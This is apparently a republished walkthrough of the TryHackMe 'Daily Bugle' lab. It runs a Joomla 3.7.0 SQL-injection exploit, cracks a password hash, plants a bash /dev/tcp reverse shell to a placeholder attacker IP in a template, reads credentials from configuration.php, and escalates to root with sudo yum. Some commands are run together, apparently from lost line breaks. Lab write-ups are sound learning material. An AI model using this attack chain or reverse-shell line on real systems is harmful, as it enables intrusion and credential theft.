[Enumeration]
- Port scan
nmap -Pn <ip>
There’re 3 ports: 22,80, and 3306.
![Image for post](https://miro.medium.com/max/60/1*BbkGRbay55pFgedlTrbyJQ.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*BbkGRbay55pFgedlTrbyJQ.png?q=20)
2. OS and service scan
nmap -A -p 22,80,3306 <ip>
This machine is CentOS.
![Image for post](https://miro.medium.com/max/60/1*ae8kEspoaIUNu6ao1sZ49Q.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*ae8kEspoaIUNu6ao1sZ49Q.png?q=20)
3. Vuln scan
nmap --script vuln -p 22,80,3306 <ip>
![Image for post](https://miro.medium.com/max/60/1*lPEaVCliz99wwSNnqyowWQ.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*lPEaVCliz99wwSNnqyowWQ.png?q=20)
This machine has Joomla 3.7.0 ,which has SQLi vulnerability.
![Image for post](https://miro.medium.com/max/60/1*0ExYHx6rPyHm0K7atIDzhA.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*0ExYHx6rPyHm0K7atIDzhA.png?q=20)
4. Access HTTP site.
There’s news of Spiderman robbing the bank.
![Image for post](https://miro.medium.com/max/60/1*U_Zq9ooOGr464PJu8F5HvA.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*U_Zq9ooOGr464PJu8F5HvA.png?q=20)
View page source, nothing.
![Image for post](https://miro.medium.com/max/60/1*HYoExu83DNrZSGH2eEk52Q.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*HYoExu83DNrZSGH2eEk52Q.png?q=20)
From #3, let’s access /administrator
![Image for post](https://miro.medium.com/max/60/1*ziWFGh4B52dRKu5yznGCoA.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*ziWFGh4B52dRKu5yznGCoA.png?q=20)
5. Search for default credential.
I only have “admin” without any password.
![Image for post](https://miro.medium.com/max/60/1*gd8DofQ0oECP0h9d68SAfw.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*gd8DofQ0oECP0h9d68SAfw.png?q=20)
6. Search for exploits
searchsploit joomla 3.7.0
There’re SQLi and XSS.
![Image for post](https://miro.medium.com/max/60/1*CrNEHGUuRokzT6cU9jn-rw.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*CrNEHGUuRokzT6cU9jn-rw.png?q=20)
Read XSS. It’s CVE-2017–8917 and sqlmap usage, but U will search for python script instead.
![Image for post](https://miro.medium.com/max/60/1*3oi3sNa7Wn_rg3VaVmewPw.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*3oi3sNa7Wn_rg3VaVmewPw.png?q=20)
[Exploitation]
- After searching with google, I came across to this.
stefanlucas/Exploit-Joomla
CVE-2017-8917 – SQL injection Vulnerability Exploit in Joomla 3.7.0 – stefanlucas/Exploit-Joomla
github.com
python joomblah.py http://<ip>
Now I have a username, jonah, and password hash.
![Image for post](https://miro.medium.com/max/60/1*xy5rKyDivOFQcdxzlmXZjw.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*xy5rKyDivOFQcdxzlmXZjw.png?q=20)
2. Cracking password
Using example hash guide
example_hashes [hashcat wiki]
If you get a “line length exception” error in hashcat, it is often because the hash mode that you have requested does…
hashcat.net
The hash may be bcrypt.
![Image for post](https://miro.medium.com/max/60/1*Zu-JI3Ua_lLwHm2iolwDkQ.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*Zu-JI3Ua_lLwHm2iolwDkQ.png?q=20)
I will use hashcat on windows for better formance.
Save hash in text file as daily-bugle.txt.
![Image for post](https://miro.medium.com/max/60/1*cbJy2BloL_kdxCoM_Meyxw.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*cbJy2BloL_kdxCoM_Meyxw.png?q=20)
Use hashcat
hashcat.exe -m 3200 daily-bugle.txt rockyou.txt
Now I have a password for joomla.
![Image for post](https://miro.medium.com/max/60/1*52qccZJ0w63NRJuxe6LEvw.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*52qccZJ0w63NRJuxe6LEvw.png?q=20)
3. Login to Joomla
![Image for post](https://miro.medium.com/max/60/1*tLIflVr9maVOUkCbN0h3DQ.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*tLIflVr9maVOUkCbN0h3DQ.png?q=20)
Now I have a dashboard.
![Image for post](https://miro.medium.com/max/60/1*hLFaMf2A8ClNfqubpytThQ.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*hLFaMf2A8ClNfqubpytThQ.png?q=20)
4. Reverse shell
I will use this guide to get reverse shell.
Joomla: Reverse Shell
Joomla is one of the popular Content Management System (CMS) which helps you to build your website. Joomla has gained…
laptrinhx.com
Click “Templates”.
![Image for post](https://miro.medium.com/max/60/1*7jEX2P-grtOvIAgCzet4OA.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*7jEX2P-grtOvIAgCzet4OA.png?q=20)
Select first template
![Image for post](https://miro.medium.com/max/60/1*hblJrT4vprE11lMEgiSIGQ.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*hblJrT4vprE11lMEgiSIGQ.png?q=20)
Select index.php
![Image for post](https://miro.medium.com/max/60/1*vrEqrRkQBsBTShwvk2Y77Q.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*vrEqrRkQBsBTShwvk2Y77Q.png?q=20)
Prepare listener on port 1234
nc -lvp 1234
![Image for post](https://miro.medium.com/max/60/1*qWX5_NVmHscLWtt9hG2kiQ.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*qWX5_NVmHscLWtt9hG2kiQ.png?q=20)
Prepare reverse shell
exec("/bin/bash -c 'bash -i >& /dev/tcp/<attacker ip>/1234 0>&1'");
Inject with reverse shell
![Image for post](https://miro.medium.com/max/60/1*ZGrnJkBDlXVMY9W-PYqfKw.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*ZGrnJkBDlXVMY9W-PYqfKw.png?q=20)
Click Template review
![Image for post](https://miro.medium.com/max/60/1*5cf03XrUw_khH4Cb8dmvlQ.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*5cf03XrUw_khH4Cb8dmvlQ.png?q=20)
Now I have a shell.
![Image for post](https://miro.medium.com/max/60/1*2ZvnZP0s3lTWKxJiXSiyCQ.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*2ZvnZP0s3lTWKxJiXSiyCQ.png?q=20)
[Privilege Escalation]
- Verify user
id
I’m apache.
![Image for post](https://miro.medium.com/max/60/1*BGsRbdFoYyD5l9GhTZSQcg.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*BGsRbdFoYyD5l9GhTZSQcg.png?q=20)
2. Normally most CMS have credential in config file. Let’s get it in case I need somewhere else.
ls cat configuration.php
I have a new credential. I can use it somewhere.
![Image for post](https://miro.medium.com/max/60/1*P3btKdVbBaTcfnwnMur6JA.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*P3btKdVbBaTcfnwnMur6JA.png?q=20)
3. Verify users
cat /etc/passwd
This machine has 2 users: root and jjameson.
![Image for post](https://miro.medium.com/max/60/1*JHFLggBB_eTk-Pj3qeAhwA.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*JHFLggBB_eTk-Pj3qeAhwA.png?q=20)
4. Login as jjameson
Try to login with joomla credential
su jjameson
Failed!!!
![Image for post](https://miro.medium.com/max/60/1*SZH-6B0u2G4OHD1dYQpQdQ.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*SZH-6B0u2G4OHD1dYQpQdQ.png?q=20)
Try to login with credential from config file
su jjamesonid
Success!!!
![Image for post](https://miro.medium.com/max/60/1*DfWS8W8nxyANKaoMD32_Ww.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*DfWS8W8nxyANKaoMD32_Ww.png?q=20)
5. Verify sudo
There’s yum command.
![Image for post](https://miro.medium.com/max/60/1*FJLHygdRYDZX9W-hJN_2DQ.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*FJLHygdRYDZX9W-hJN_2DQ.png?q=20)
Following GTFOBins. There’re 2 ways of exploiting
yum | GTFOBins
It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated…
gtfobins.github.io
Let’s try first set of commands
![Image for post](https://miro.medium.com/max/60/1*z-WU7Z6iSKQ-g5x-RzfurA.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*z-WU7Z6iSKQ-g5x-RzfurA.png?q=20)
Failed!!!
![Image for post](https://miro.medium.com/max/60/1*vH9m5RugJsD73uYBtfLHxA.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*vH9m5RugJsD73uYBtfLHxA.png?q=20)
Let’s try these instead
![Image for post](https://miro.medium.com/max/60/1*klzw1Fnifvx_k1KjzWmrag.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*klzw1Fnifvx_k1KjzWmrag.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*uzzS4y_UG_cerzg9impzcg.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*uzzS4y_UG_cerzg9impzcg.png?q=20)
6. Read user.txt
Now I’m root. Let’s get the answer for this box
cd /home/jjamesonlscat user.txt
![Image for post](https://miro.medium.com/max/60/1*vkaxPY3TwLchekFMvT7cEA.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*vkaxPY3TwLchekFMvT7cEA.png?q=20)
cd /rootlscat root.txt
![Image for post](https://miro.medium.com/max/60/1*kHFsAImsa9hJG3HP41pFGA.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*kHFsAImsa9hJG3HP41pFGA.png?q=20)
未经允许不得转载:萌萌guo angline - Apprentissage » Tryhackme:Daily bugle_CTF